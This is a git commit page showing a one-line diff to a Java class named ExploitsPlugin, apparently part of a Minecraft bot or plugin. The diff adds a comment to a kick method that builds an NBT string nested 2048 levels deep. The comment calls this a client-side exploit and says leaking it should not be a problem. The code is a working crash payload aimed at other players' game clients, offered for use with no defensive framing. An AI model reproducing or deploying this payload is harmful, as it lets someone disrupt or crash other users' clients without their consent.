add another fart
This commit is contained in:
parent
ffd618f157
commit
92da178c80
1 changed files with 1 additions and 1 deletions
|
@ -13,7 +13,7 @@ public class ExploitsPlugin {
|
||||||
}
|
}
|
||||||
|
|
||||||
public void kick (UUID uuid) {
|
public void kick (UUID uuid) {
|
||||||
|
// this is a client-side exploit so i think leaking it shouldn't be a problem..,.,
|
||||||
String nbt = "{a:".repeat(2048) +
|
String nbt = "{a:".repeat(2048) +
|
||||||
"''" +
|
"''" +
|
||||||
"}".repeat(2048);
|
"}".repeat(2048);
|
||||||
|
|
Loading…
Reference in a new issue